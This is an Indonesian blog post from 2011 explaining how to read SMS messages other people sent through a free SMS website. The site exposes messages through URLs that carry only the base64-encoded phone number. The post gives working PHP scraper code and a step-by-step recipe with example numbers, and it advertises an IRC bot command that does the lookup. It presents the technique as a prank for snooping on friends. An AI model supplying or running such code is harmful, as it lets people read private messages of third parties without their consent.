Welcome To My Blog

Senin, 19 Desember 2011

Mengintip SMS yang dikirim dari www.sms-online.web.id

Just info, www.sms-online.web.id merupakan situs yang menyediakan fasilitas untuk mengirim SMS gratis ke nomor GSM maupun CDMA.

yarp, setelah sebelumnya kita memanfaatkan situs www.sms-online.web.id sebagai SMS Gateway untuk mengirimkan sms lewat bot, sekarang mari kita lihat SMS apa aja yang dikirim oleh orang lain ke nomor HP teman kita melalui situs tersebut.

Setelah kita mengirim SMS dari situs tersebut, sebuah pesan akan muncul :

"Simpan alamat ini, alamat ini dapat digunakan untuk melihat inbox (sms masuk dari 085256593315 ), untuk hari seterusnya
http://www.sms-online.web.id/sms/sms.html?d=inbox&f=inbox.gammu.list&Phonenumbers=MDg1MjU2NTkzMzE1"

Lalu terdapat juga link ke alamat berikut ini:
http://www.sms-online.web.id/sms/sms.html?d=sentitems&f=sentitems.list&Phonenumbers=MDg1MjU2NTkzMzE1

Melihat alamat ini, terlihat sebuah kode yang telah dienkripsi menggunakan encode base64, yakni kode "MDg1MjU2NTkzMzE1", setelah di decrypt, kode tersebut ternyata adalah nomor 085256593315 yang merupakan nomor tujuan SMS. Lalu bagaimana kalo kita iseng mengganti nomor tersebut dengan nomor HP teman kita? yarp, jika sudah ada yang pernah mengirim SMS ke nomor HP teman kita, maka pesan tersebut bisa kita baca. :p

let's coding it.. :)

<?php
function 
getSMS($hp,$content){$url "http://www.sms-online.web.id/sms/sms.html?d=".$content."&f=".$content.".list&Phonenumbers=".base64_encode($hp);$ch curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFERtrue);$getSource curl_exec($ch);curl_close($ch);$f1 explode("STATUS",$getSource,2);$f2 explode(base64_decode("Z29vZ2xlX2FkX2NsaWVudA=="),$f1[1]);$f3 explode(htmlspecialchars("</td>"),htmlspecialchars($f2[0]));$a=1;for($i=1;$i<(count($f3)/7)+1;$i++){echo "Pesan ke-".$i."<br>";echo "Waktu: ".str_replace(htmlspecialchars("&lt;td &gt;"),"",htmlspecialchars($f3[2+(6*($i-1))]))." -- ".$i."<br>";echo "Nomor: ".str_replace(htmlspecialchars("&lt;td &gt;"),"",htmlspecialchars($f3[4+(6*($i-1))]))." -- ".$i."<br>";echo "Pesan: ".str_replace(htmlspecialchars("&lt;td align=&quot;left&quot; class=&quot;td_left&quot; &gt;"),"",htmlspecialchars($f3
[5+(6*($i-1))]))." -- ".$i."<br>";$a++;}}echo "<form name='f' method='post' action=''>
Masukkan No. HP : <input type='text' name='hp'><input type='submit' name='submit'>
  </form>"
;if(isset($_POST['submit'])){$hp $_POST['hp'];$content "sentitems";getSMS($hp,$content);}?>

Dengan code diatas, kita tinggal memasukkan nomor HP tujuan yang ingin kita lihat semua SMS yang telah dikirim ke nomor tersebut.

[Romeo] : Wah, berarti SMS cinta-cinta yang aku kirim ke Juliet bisa dibaca semua orang dong?
[K4pT3N] : iya..
[Juliet] : Romeo say, kamu ngirim sms cinta-cinta apa ke nomorku? kok gak masuk? aku udah ganti nomor. belum tau ya say? Eh, K4pT3N, trus kalo aku gak ngerti programming, gimana caranya biar bisa lihat SMS yang dikirim Romeo padaku? kan aku udah ganti nomor?
[K4pT3N] : Gini...
liat ja alamat ini:
http://www.sms-online.web.id/sms/sms.html?d=sentitems&f=sentitems.list&Phonenumbers=MDg1MjU2NTkzMzE1

code setelah Phonenumbers itu ganti ja dengan nomor HP nya Romeo, trus enkripsi pake encode Base64. GUnakan situs ini untuk mengenkripsi:
http://tools.explorecrew.org/enc-dec.php
Misalnya, nomor HP nya Romeo adalah 08124463435, gunakan situs tersebut untuk enkripsi sehingga akan didapat kode MDgxMjQ0NjM1MzY= lalu ganti alamat diatas menjadi:
http://www.sms-online.web.id/sms/sms.html?d=sentitems&f=sentitems.list&Phonenumbers=MDgxMjQ0NjM1MzY=

[Juliet] : Oh gitu ya.. thx ya.. ok deh say Romeo, aku cek SMS yang kamu kirim ke nomor lamaku ya?

// End Of Story

Buat yang gak pengen coding ataupun mengenkripsi dulu untuk melihat SMS dengan cara diatas, silahkan maen ke IRC server @byroe di chan #jmozac #byroe #conf , udah aku buatin bot-nya, gunakan perintah:
.yarp sent No_HP

Semoga bermanfaat ^_^

Tidak ada komentar:

Posting Komentar

 
Buku Tamu